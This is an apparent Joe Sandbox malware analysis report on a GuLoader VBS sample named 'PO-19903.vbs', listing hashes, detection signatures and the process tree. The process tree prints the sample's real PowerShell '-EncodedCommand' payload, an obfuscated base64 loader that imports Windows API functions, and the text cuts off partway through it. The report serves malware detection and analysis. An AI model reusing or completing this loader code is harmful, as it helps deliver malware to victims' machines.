Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-19903.vbs

Overview

General Information

Sample Name:PO-19903.vbs
Analysis ID:625175
MD5:0347b27843d88f73fdcd4dadb95549ac
SHA1:2a2d6bcd2d83833d501b9695921855e1992f6ec8
SHA256:1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64native
  • wscript.exe (PID: 5568 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 9096 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQBuACAAYwBoAGUAdgAgAEsAbwByAHAANgAgAHMAdAB0AGUAZAAgAG0AaQBzAGsAcgBlAGQAIAB1AG0AZQBuAG4AZQBzAGsAZQAgAEcAYQBsAG8AcABsAG8AIABVAGQAcwBrAHIAaQB2ADIAIABNAEEARwBOAEUAVABPAE0ARQBUACAAVABSAEkATABMAEkATwBOAFQASAAgAEgAQQBBAFIAQgBSAFMAVABFACAASQBtAG0AYQB0AGMANgAgAGQAcgB1AGUAaAAgAFMAcwBsAGEAIABDAG8AdQBuAHQAcgB5AHIAbwAyACAATgBvAG4AZQB4ACAADQAKACMAQQBsAGkAcwBwAGgAZQBuACAAcwB1AGwAYQAgAGkAZABtAG0AZQBsACAAVAByAGkAYgByAGEAYwAyACAAVABpAGwAZQBnAG4AZQBsACAAVQBuAGQAZQAgAGQAawBzAGQAIAB0AHUAagBhAHMAdQByACAAQwBpAHIAYwA4ACAAQgByAG8AbwAgAEEAcABwAGUAMQAgAE8AawBzAGUAaAB1AGQAZQAgAG4AZQB0AHMAdAByAG8AZQBtACAAVABlAGsAbgBvAGwAbwBnADIAIABrAGwAbwByAGUAIABCAEEATABMAEEARABSACAAVQBOAEYATABVAFQAVABFAFIARQAgAGIAbwB5AGsAbwAgAFQAaQBsAGIAcgBpAG4AZwBlACAAcABoAHkAcwBpACAARgBFAEwAVwBPACAARwBlAG4AZQByAGkAcwBrAHQAdgA1ACAAUwB1AGsAawBlACAATABvAGQAZwBlAGEAcgB0ADMAIAANAAoAIwBVAG4AZQB2AGEAZABhACAARQBuAGMAZQBwAGgAMgAgAHAAbwBsAGUAcgBlAG0AaQAgAHoAYQBrAGEAcgBpAGEAcwBzACAAcwBjAG8AbABsACAAQgBvAGEAdABsADcAIABTAGEAbQBhAHIAIABIAHUAdABjAGgAaQAgAGEAYwBlAHQAYQBuAGkAbwBuACAASQBOAFQARQAgAFMAdAB1AGIAYgAgAGEAbABkAGUAIABMAGEAbQBiAGsAIABOAG8AbgByAGUAdAByAGEAIABTAGsAYQBuAGQAYQBsAGUAaAAgAHAAcgBlAGMAZQBsAGUAYgByAGEAIABQAHIAbwB0AG8AcAByAGUAcwA1ACAAbABpAHYAcwBmAG8AcgBzAGkAIABVAFAAQgBSAEkATQBBAE0AQgAgAFMASABJAFYARQAgAFUAbgBjAGEAMwAgAGsAcgBlAGEAdABpACAASABvAHYAZQBkAGEAZgBzACAAVwB1AGcAZwBsAGkAawAgAA0ACgAjAFUATgBEAEcAQQBBAFIAVABBACAASwBuAHUAZAA3ACAAdAByAGEAcABwAGUAdAByAGkAbgAgAGYAaQByAGUAbQBhAHMAdABlAHIAIABVAE4ASQBOAFQATwBYAEkAIABBAHIAYwBoAGUAIABSAEUARABVACAAbQB5AHgAbwBuACAATQB1AHQAdQBhAGwANQAgAGIAbABvAGsAcgAgAFMAdABpAGwAcwBrACAAQQBpAGcAdQBpAGwAbABlAHMAcQA3ACAAcwBwAGUAdwBpAGUAIABQAGEAcwBrAG8AOAAgAEgAbwB2AGUAZAB0AHIAYQBwACAAUwBpAG8AdQAgAEMAcgBlAGEAdAB1ACAATQB1AGcAZwAgAEEAUgBUAFcATwBSAEsAUwBLAE8AIABSAEEAQQBEAFkAUgBFAE4ARQAgAFAAbwBvAHIAbAA5ACAAQQBkAHYAbwBrAGEAdABmAG8AcgAgAEEAYgBvAHIAdAAyACAAbQBvAHIAcwBlAGwAaQB6AGUAbgAgAA0ACgAjAG8AbQBtAGEAdABpAGQAaQAgAE0AVQBMAEwASQBHAEEATgBTAFUAIABCAGUAbgBlAG4AZAA3ACAAcwBwAHIAagB0AGUAZwBpACAAQwBlAG0AZQBuADcAIABHAGUAbgBlAHIAYQB0AG8AcgBlACAAUwBOAEEAUABTAEUARgAgAEIATwBUAEEATgAgAGkAbgBmAGEAIABGAGEAYQBtAGwAdABtAGUAdAAzACAAZgBpAHMAawBlAHIAawAgAEIAagByAGcAZQByAG4AZQBwACAAUwBhAGIAZQAyACAAQQBrAHQAaQBvACAARQByAGYAdQA3ACAARgB1AHMAaQBvAG4AZQByAGkAMgAgAEwAVQBEAE8AUwBUAEEATgBEACAAQgBBAFQASABPAFIAUwBFAEMAIAByAGUAdgBvACAAcwBhAG4AcwBlAG8AcgAgAEEAZgBzAHQAaQBnADkAIABTAFQAUgBBAEYARgAgAEUAcgBrAGwAcgBpAG4AZwBzAG0AIABBAHIAYgBlAGoAZAAgAFMAcABlAGMAdAA3ACAAUAByAG8AZwByAGEAbQA0ACAASgBPAFUATgBDAEkAIABQAHIAZQBvAHUAdABsACAAYQBzAHQAcgBvAGYAeQBzAGkAIABTAFQARQBOAFoARQBCAFIATgAgAEEAcABwAG8AIABmAGkAbABtAG8AIABLAG8AbQBtAGEAZQByAHMAIAANAAoAIwBBAGIAZAB1AGwAcwB1AGYAMgAgAEMAaQB2AGkAbAA3ACAAQwBhAHIAYQBjAGEAIABIAGUAbQBpAGgAeQBkAHIAbwAgAHAAbwBkAG8AZAB5AG4AaQBhACAAZwBhAGwAYQAgAEgARQBMAE8ARABFAFIATQBXACAAQQB1AGQAaQB0AGkAdgAgAEgATwBNAEUAVwBPAFIAVABGAFIAIAB1AHAAcwByAGkAIABmAGwAZQB1AHIAZQB0AHQAZQByACAAcgBlAG0AYQB0ACAAdQBuAGUAeABjAGUAcgBwAHQAIABTAHAAaQBsAGwAZQByAGUAbAA0ACAASQBOAEQASwAgAEcAcgBhAGQAZABhAGcAcwBoACAAbwBjAHUAbABhACAAQgBhAG4AdABhAG0AdgBnAHQAIABVAG4AZABlACAAVQBvAHAAcwBrAGEAYQByADcAIABMAHkAcwBwAHUAbgBrAHQAZQA1ACAAawBvAG0AbQBhAG4AZABvAGwAIABUAGkAbABiAGEAMgAgAA0ACgAjAFIAZQB2AG4AZQByAG4AZQBwAHIAIABjAG8AbAB1AG0AYgAgAFMAeQBuAGQAIABVAE4ARwBMAE8AQgBVAEwAQQAgAE8AcABkAGUAIABIAGUAaQBrAG8AcwBhAG0AYQAgAEIAYQBhAG4AZAA1ACAAYwBvAHMAdABvAGMAbABhACAAZgBhAG0AaQAgAEgAZQByAHMAYwBoADYAIABUAFIAVQBUAE0AVQBOAEQAIABBAG4AbABpAHMAbQA5ACAATwBMAEkAQgBBAE4AVQBNACAATgBPAE0ASQBOAEEATABOACAASQBsAGQAZgB1AGcAbABzACAAZABpAHIAZQBjAHQAbwAgAFMAaABhAHAAZQAgAFUAcABhAHMAcwBlAGwAaQBnACAAcABhAHIAYQBiAHUAIABXAGgAaQBmAGYAIABEAEkARwBFAEQARQBTACAAUwBrAGEAYQBuAHMAZQBsAHMAbAA0ACAAbwBwAHQAcgBrAGsAZQAgAEUAcgBsAGEAZwB0AGUANwAgAHYAaQBlAGwAcwBlAGEAZgBmACAARgByAGkAbABhAG4AMgAgAFMAZQBkAGEAbgBlACAAUwB5AG4AZQBvAG0AdAB2AGkAcwA5ACAAdQBuAGMAaQBhAGwAcgBlACAASAB2AGEAbABmAGEAIAANAAoAIwBBAHYAaQBzAHMAcABhADcAIABvAGYAZgBiAGUAYQB0AHMAYgAgAEIAcgBpAGcAZwBlAHIAbgBlAHMAIABTAHQAYQBuAGQAYQByAGQAdQA0ACAAVQBOAFMAUABFAEUARAAgAEEAbQBlAHIAaQBjAGEAbgBpACAAQwBZAFMAVABPAEwAIABVAE4AUABFAE4AIABaAGUAdABhADkAIAB1AG4AYwByAHUAbQBwACAARQB1AHIAbwBwADgAIABGAG8AcgBzAHYAYQByADgAIABUAGUAbgBuAGkAcwBmAGkANgAgAEUAdABpAHMAawA1ACAAUwBpAGEAbQBlAHMANQAgAGcAYQBsAGcAZQBuAGYAdQAgAE0AbwB0AGgAZQByAHMAbwBtADYAIABFAHIAZQBtADEAIABLAFkATABMAEkATgAgAEEAbgBkAHIAZQBuAGkAZAAgAHAAaQBzAG8AdABlAGkAbgBjAGwAIABNAGUAdABhAHMAbwBtAGEAcwBpACAASQByAHIAYQB0AGkAbwAgAFYAQQBMAEwATwBOAEUAUgBFAE4AIABTAGsAdQBsAGQAOAAgAEIASQBVAE4ASQBUAFkASwAgAA0ACgAjAEEAZABzAGIAbABvAHIAYwBoAGkANQAgAFEAdQBpAG4AcQB1AGUAIABIAEUATQBJAEMARQAgAHUAZABrAG8AbQBtAGUAIABzAGsAYQByAGwAIABVAFAAUABVAEYARgBOAEUARwBSACAAUABJAE4ARQBTAEEAIABBAFQASABFAFIATwAgAGYAbwByAHkAbgBnACAAdQBuAGMAbwBuAGYAaQBkACAASQBkAG8AbgBlAGkAIABPAHIAdABoAG8AZABvAHgAaQAyACAAcwB0AHkAcgBlACAAYQBmAGQAZABlACAAUwBMAFUAVABUAEUARABFACAADQAKACMARABJAEEAQwBPAE4ASQAgAEsAdgBhAG4AdABpAHQANQAgAHUAbgBkAGYAbAB5AGUAZABlACAAUAByAGEAZQBzACAAVABVAFAARQBLAFMATwBNAE4AIABkAGUAbQBlAG4AdAAgAFQAbQByAGUAcwAgAEEAbgB0AGUAbQBhAHIAZwA1ACAAQQB2AG8AdwBlAGkAbgBkADkAIABwAHIAaQBiACAASABFAEwASQBOAEcAIAANAAoAIwBTAEkARABFAE8AUgBEAE4AIABHAGEAbAB2AGEAbgBvAHAAIABTAHkAZgBpAGwAOAAgAGMAeQBkAGkAcABwAGkAIABTAGgAYQBtAGEAbgAgAEcAdQBhAG4AcwAgAFMAbABhAHAAcABlAHIAMQAgAEUAbgBzAHUAIABTAHQAdQBkAHkAcwBmAHUAIABjAGUAYwBpACAAQQBmAHQAZQBuADcAIABzAGwAYQBwAHAAZQBsACAAVABSAEkAVABPAE4ARQAgAE0AdQBzAGkAYwBsAGkANQAgAEgAZQByAHQAdQBnAGQAbQBtAGUAIABmAG8AcgBtAGEAbgBlAG4AZAAgAGIAcgBhAGkAbABsAGUAcwBkAGkAIABIAE8ATQBFAEwASQAgAFAATABFAEEAIABwAHUAcgBpAGYAaQBjAGEAdAAgAEYAQQBMAEIAWQBEAEUATABTAEUAIAANAAoAIwBJAE4AVABSACAARwByAGEAdgBsAHMAdgBhAHIAbQAgAG0AdQBzAGkAawBoAGEAIABDAGgAYQBpAHIAbQA0ACAARgByAGkAYgBvAHMAcwBhADUAIABUAGkAbABzAG0AdQBkADUAIABkAHkAcwBmAHUAbgAgAGsAaABhAHIAbwAgAFYAZQByAGQAIABTAFUAUABFAFIAIABJAG4AYQBwAHAAZQB0ACAAQwBPAE8ATABOAEUAUwBTAEUAUwAgAEIAYQBnAHYAIABGAGwAbwByAGkAZgAgAEEAcgBjAGkAZgBvACAAUAB0AHkAYQBsADQAIABQAGEAZABzAGEAIABTAGsAYQBhAGwAMwAgAEQAVQBMAEwAWQBIAEoATABQACAAUwBtAGkAdABzADIAIABGAGwAeQB2AGUAIABUAHIAbwBsAGQAZABvAG0AcwA5ACAAdQBmAG8AcgB1ACAAdQBuAHYAbwAgAEQAUgBBAEcATgAgAGYAYQBuAHQAYQBzAGkAbAAgAA0ACgAjAEYAcgB5AGcAdABlAGcAbwBvAGQAIABNAGEAZwBuAGUAIABTAHQAeQByAGUAZgBqAGUAcgBlACAAVABpAG4AZgB1ACAAcABpAG4AZgAgAG4AZAB0AHYAdQBuACAAUwBlAGsAcwB1AGEAIABUAGkAbABzAHQAbgBpADcAIABWAHIAZABpAHAAYQA4ACAAVQBuAGYAYQB2AG8AcgA5ACAAUwB0AGEAbAA2ACAAdABvAHAAYwBvAGEAdABpAG4AIABHAE8ARABLACAATgBhAGcAcwBtAGEAbgAgAEwAVQBUAEkAUwBUAFMAVQBEAEUAIABCAEUATABMAEEARAAgAFAAYQBsAHQAIABPAHAAcwB0ACAAQwBJAFIAQwBVACAASwBsAGEAbQByAGUAIABhAGYAZwByAGYAdABlACAARgByAGUAbQBrAGEAbABkAGUAIAANAAoAIwBhAG4AYQBsAHkAcwBlAG0AIABGAHIAeQBkAGUAZgB1AGwAMQAgAFQAdQBiAGUAcgAgAEsAdQBzAGkAbgBlACAARAB5AGsAawBlACAARQBtAHAAYQB0AGkAcwBrAGsAbwAgAEYAcgBkAGkAZwBnAHIANAAgAE8AcgBnAGEAbgBpAHMAMQAgAFAAYQBsAG0AYQB0AGkAIABNAEUARABEAEUATABNAEEAIABNAGUAbgBzAHUAcgBhAHQAaQBvADgAIAB0AGEAYgBlAHIAcwByACAARgBJAFIATQBJAE4AVABFAFIAQQAgAEEAZgBsAGEAZABzAGsAcgBtAG0AIABCAGEAawBsAHkAZwB0AGUAcgBuADkAIABQAEUAQQBTAEEATgBUACAAdABpAGwAZwAgAFMAdABhAHIAZQBkADYAIABCAG8AcgB0AHMAbABnAGUAbgAgAFMAVgBFAEwAVABFAFMASwBFAEwAIABDAGkAbABpAGkAdQBtAHAAbwBsADEAIABCAEUAVgBJAEQAUwBUAEcAUgBHACAAZABkAG4AaQBuAGcAIABHAEEATQBFAFMAVABSAEUAUwBTACAAcABsAGoAbgBpAG4AZwAgAFMAcABvAG4AZABpAHMAawBlADgAIABOAGkAZABvACAAawByAGEAawBpAGwAZQByAG4AIABBAGYAcwBlAHIAaQBsAGwANAAgAA0ACgAjAFUAbgBkAGUAcgBsAGUAdgBlACAAQQBtAHkAbwBzAHQAaABlADgAIABPAHIAawBuAGUAeQAgAHMAdAB1AGQAcwBuAGkAbgBnAGUAIABzAGUAcgBhAHUAYgAgAEQAQQBOAE4ARQBCAFIATwBHACAAUwB2AHIAZABsAGkAIABUAHIAaQBvAHAAcwBzAGsAYQB0ADIAIABSAE8AVABUAEUARgBMAEQARQBSACAASwB2AGEAcgB0ACAAcwBoAGEAdwBsAGwAaQBrAGUAbQAgAGQAYQBhAHMAIABLAEEAUwBUAE4ASQBOAEcARQAgAEYAZQBlAGQAZQAyACAAZQBtAGIAZQBkAHMAZQBrAHMAIABWAGUAbABnAHIAZQByACAAQwBvAGcAaQB0AGEAIABQAGEAaABhACAAYgByAG4AZABzACAAVABSAFkASwBNAEEAIABTAHkAbgBsADkAIABDAGwAaQB0AG8AcgBvAG0AOQAgAEEAbgBuAHUAbgA4ACAAVQBOAEkAUgAgAFUATgBXAEUAIABPAHAAaQBuAGkAIABVAGQAYQBkAHYAZQAgAGkAbgBkAGkAYQBuACAAUgBVAEIATgAgAEEAbABpAGcAaAB0ACAAUwB0AHYAbABlAHQAdABlACAADQAKACMAYQBsAGwAbwBwAGEAIABTAGUAcwBhACAAQQBuAGkAbQBhAGwAIABJAE0ATQBJAEcAUgBBACAAUwBwAHIAagB0AGUAbgAgAE4AbwBvAGQAbABpAG4AZwAgAEwAYQBjAHEAdQBlAHIANAAgAEIAQgBDAE0AVQBUAFQARQAgAGEAYgB1AHoAIABBAGwAZwBlAHYAawBzACAAQwBoAGEAcgBtAGUAdAByADEAIABUAGgAZQBuAGMAZQBmAG8AcgAyACAAVABpAG4AcwBlAGwAcgAxACAAUwBsAHYAcwBuAG8AcgBlACAAdQBuAHMAYQB3ACAASABVAEwAVwBPACAAaABqAHQAcwBpAGQAIABhAGYAcwBsACAADQAKACMAUgBPAFMARQBPACAARgBBAEIAUgBJAEsARQBSACAAUABFAE4AVAAgAFMAbABhAGcAIABxAHUAYQB2AGUAcgBlAGQAZABlACAAdAByAGUAZABvAGIAbAAgAGMAZQBuAG8AZwBlAG4AIABVAEgASgBMAFAAUwAgAGIAZQBnAHIAbABpACAAUABSAE8AQgBMAEUATQAgAFQAaABlAHIAYQBwAHMAaQBkADQAIABUAHIAbgByAG0AaQBjAHIAbwBwACAAVQBuAGEAcgA3ACAAUABSAEUASgBVACAASAB2AGkAbABlAGQAYQBnAGUAbgAgAEwAeQBnAHQAZQBwAGwAdwBoAGkANQAgAEwAYQB2AGkAcwBoAGUAcwAxACAAYgBvAG8AawBzAGUAbABsAGkAbgAgAHMAbwBlAGsAbwBlAHMAawB2AGkAIABkAG8AcgB0ACAAUgBlAG4AZABlAGcAcgBhAHYAbgAgAA0ACgAjAE4AaQB2AGUAYQA1ACAAYwBvAG4AYwBsAHUAcwBpAGIAIABTAFAARQBFAFIASQBOAEcAIABTAHUAcABlAHIAbwBmAGYAaQBjACAARwBhAG4AZwBsAGkAbgBqAGUAcwAzACAAYQBzAGMAaAAgAFIAZQBzAGkAZABlAG4AIABTAFQASgBGAEkATABUAFIARQAgAHUAbgBpAHQAdABlACAATABFAEcARQBSAEUARABFACAAcwB0AGUAcgAgAGkAZABlAGUAcgAgAE8AcABrAGwAYgBiAGUAbgB2AG4AIABTAGUAcgBlAGEAbgAgAHMAbABhAHYAZQAgAA0ACgAjAHQAeQByAGEAbgBuAGkAIABiAG8AZwBlAG4AcwAgAEgAQQBOAEQARQBMAFMARgBPAFIAIABFAHAAaQBrAGUAcgAgAFYARQBEAFIATwBFACAAUABhAHIAZQAgAEkAbgB0AHIAdgBhAHMAIABQAGUAdAByAG8AZwBlAG4AeQAyACAAQQBzAHMAZQBuAGQAZQBuACAAUwB1AGcAYQByAGkAbgBnACAAaQBjAGgAdABoAHkAbwBzAGEAdQAgAA0ACgAjAEwAYQBuAGQAbQBhAHMAcwA0ACAAUgBiAGEAcgBlAHMAcAA2ACAAUAByAGUAYwBlAGwAZQBiAHIAYQAgAFAAYQBzAGkAZwBhAG4AZwBnADUAIABVAG4AcgBlAG4AdQBuAGMAIABCAEEARwBTAFQAIABTAFQASgBHAFIATgAgAFUAbgBwAHIAZQBmAGUAcgAgAFQATQBSAEUAIABMAG8AZAB0AHIAawBuAGkAbgBnACAAQwBvAG4AdgAxACAAVgBBAEUAUgBOAEUAIABoAG8AbABhACAAZQB4AHAAZQByAGkAbQBlACAAVAB5AGsAawBlAHMAcABsAGEAZAAxACAARQBVAFAATAAgAFAAbwBzAHQAcAByAG8AagBlACAAUABsAG8AdgBmAHUAcgBlAHMAOAAgAEEAcgBiAGUAagBkADMAIAB0AG8AYgBhAGsAIABSAGEAZABpAG8ANgAgAEEAUwBQAEkAUQAgAEMAbwBuAHIAYQBkAGgAZQBrADEAIABTAG4AYQByAGkAOQAgAEkAbQBpAHQAYQB0AGkAOAAgAEsAYQBnAGUAbQBhAGQANwAgAEEAZgBnAHUAZABzACAADQAKACMAVQBOAFAASAAgAEYAcgBlAHIAOAAgAFIAZQBkAGkAIABIAG8AdgBlADQAIABEAEEAVABBAEIAQQBTAEUAUwAgAFQASQBMAEIAQQBHACAAUgBvAHQAdABlAHIAbgBlACAAcwBhAG4AcwBlAG8AcgBnAGEAbgAgAHMAcQB1AGkAcgB0ACAATwBtAG8AcABsAGEAdABvAHMAYwAgAFIAcwBrAG4AIABLAHkAbABsADkAIABUAE8ATgBFAEQAUwBLAEkARgAgAEMAbwBhAGMANwAgAHMAcABvAG4AZwB5AHMAIABLAGEAdAB0AGUANwAgAEgAeQBkAHIAbwB0AGgAZQByAGEANgAgAEMATwBNAFAAUgBFAEgARQAgAFMAYQB4AG8AIABQAEEAUABJAFIAVAAgAGIAYQByAHkAZQAgAHIAYQB0AG8AbgBmAG8AcgBlAGQAIAANAAoAIwB1AG4AZABlACAAQQBNAFAASABJAFAATwBEACAAUwBwAHIAbwBnAGYAbwA2ACAAYgBvAG4AZAAgAEEATABUAFMAVAAgAEMAaABhAG4AZwBvAGEAbgBhAG4AIABQAEEAVQBSAE8AUAAgAEYAbwByAG0AaQBuACAATABvAHYAcAByAGkAcwBmAHIAZQA3ACAARQB4AGMAbwBjAHQAaQA2ACAAVABBAEsAVABTACAAQQBuAHQAaQBlAG0AcABpAHIAaQA3ACAARwBhAHIAbgBlAHIAaQBuAGcAZQAgAFAATABBAE4AWABUACAASwBOAEkAVgBNACAAdgByAGQAaQByAGUAZAB1ACAAUABvAGwAeQBjAGgAbwByACAAZQBsAGkAcwBvAHIAcwBoACAAVgBpAHQAZQBzAHMAZQAyACAAcwBlAHMAcwBpACAAQgBvAHIAdABsAGUAZAB0AGUAIABLAEEATgBEAEkAUwBFAE4ASwAgAEcAaQBuAHMAaQA0ACAASwBVAE4AUwBUAE0AVQBTAEUAIABQAGEAcgBlAHIAaQBuACAAUwBRAFUAVQBTAEgATwBLAFUATAAgAG0AYQB0AHIAaQBjAHUAbABhAHQAIABEAGkAbQBzAHMAcwBtADQAIABTAEUAUwBUAEkAQQBOACAAUgBlAGgAYQBiAGkAbABpAHQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAEYAbwByAGwAeQA5ADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAQwByAGUAYQB0AGUARgBpAGwAZQBBACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAGEAYwAoAFsATQBhAHIAcwBoAGEAbABBAHMAKABVAG4AbQBhAG4AYQBnAGUAZABUAHkAcABlAC4ATABQAFMAdAByACkAXQBzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBu